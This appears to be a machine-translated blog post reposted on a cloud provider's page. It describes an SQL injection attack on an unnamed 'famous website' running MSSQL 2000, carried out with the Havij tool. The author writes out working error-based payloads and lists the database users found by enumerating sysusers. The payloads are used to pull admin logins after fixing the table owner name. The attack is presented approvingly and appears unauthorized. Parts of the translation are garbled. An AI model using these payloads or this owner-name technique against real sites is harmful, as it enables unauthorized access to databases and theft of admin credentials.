One injection of the database table owner

Source: Internet
Author: User
Tags sql server driver odbc sql server driver havij

The day before yesterday, I found the injection of a famous website, which belongs to the Mssqlserver2000 explicit and incorrect mode. I am not talking about it, just inject it when havij starts. (PS: The HAVIJ version I used is Havij 1.14 Pro). Obtain the following information:

DB Server: MSSQL 2000 with errorCurrent User: chwebnewsSql Version: Microsoft SQL Server 2000 - 8.00.760 (Intel X86)Dec 17 2002 14:22:05Copyright (c) 1988-2003 Microsoft CorporationEnterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)Current DB: ChineseNews

All databases are exposed smoothly, and then violent tables and fields are exposed.
But the content is not exposed. havij prompts that the count cannot be obtained.

The packet is captured. Get statement

(SELECT TOP 1 cast(count(*) as nvarchar(4000)) FROM ci_admin )%2bchar(126)))
 and 1=1

An error occurred while placing this statement in IE. The object Ci_admin does not exist. Naturally, the total number of records cannot be found, and violent data cannot be found.

Think twice about it. Havij cannot be panic. Ci_admin should be capitalized, and URL transcoding should be performed in the form of database +... + Table Name

(ChineseNaws... ci_admin) or chineseNaws. dbo. ci_admin still fail, and the same error message is returned. Suddenly think of the meaning of dbo in front of the table name, that is, the meaning of the database creator. Database Name + owner name + Table name, which is a complete form of table name.

The reason why the incorrect invalid object Name is reported may be that the owner Name is incorrect.

Havij cannot scan the out-of-band table. I have to manually add the sysusers table.

Add the Name field instead of scanning the field. Simply add the Name field, this is because when I use this havij to construct an injection statement, it will automatically add the primary key found during the scan. As a result, the statement structure error occurs and non-primary key data cannot be obtained, it should be a BUG of this software.
There are 17 records for scanning out sysusers

Count(*) of sysusers is 17Data Found: name=chinesewsData Found: name=chwebnewsData Found: name=db_accessadminData Found: name=db_backupoperatorData Found: name=db_datareaderData Found: name=db_datawriterData Found: name=db_ddladminData Found: name=db_denydatareaderData Found: name=db_denydatawriterData Found: name=db_ownerData Found: name=db_securityadminData Found: name=dboData Found: name=guestData Found: name=publicData Found: name=webData Found: name=webnewsData Found: name=wssnewsa

Replace the obtained usernames (users starting with db _ can be decisively excluded),(char(126)%2b(SELECT TOP 1 
cast(count(*) as nvarchar(4000)) FROM chineseNaws .
Substituted variable. ci_admin) % 2 bchar (126) and 1 = 1

When the current input is chinesews, no error occurs. Expected result 2 is displayed.

Use the following statement to obtain all data,(char(126)%2b
(SELECT TOP 1 cast(login as nvarchar(4000)) FROM (SELECT TOP 2 login FROM 
ChineseNews.chinesews.ci_admin) sq order by login desc)%2bchar(126))) and 1=1

However, some tables cannot be read even if they are correctly constructed because the table does not have the select permission granted to the current database user,

This cannot be solved by constructing correct injection statements. As shown below

SQLState: 42000Native Error Code: 229[MERANT][ODBC SQL Server Driver][SQL Server]SELECT permission denied on 
object ci_login, database EMS, owner dbo.

Summary: In the sqlserver database, the database name + owner name + Table name is a complete form of table name. When a prompt indicating that the table does not exist during injection, check the table owner name in the injection Statement, which is easy to ignore.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.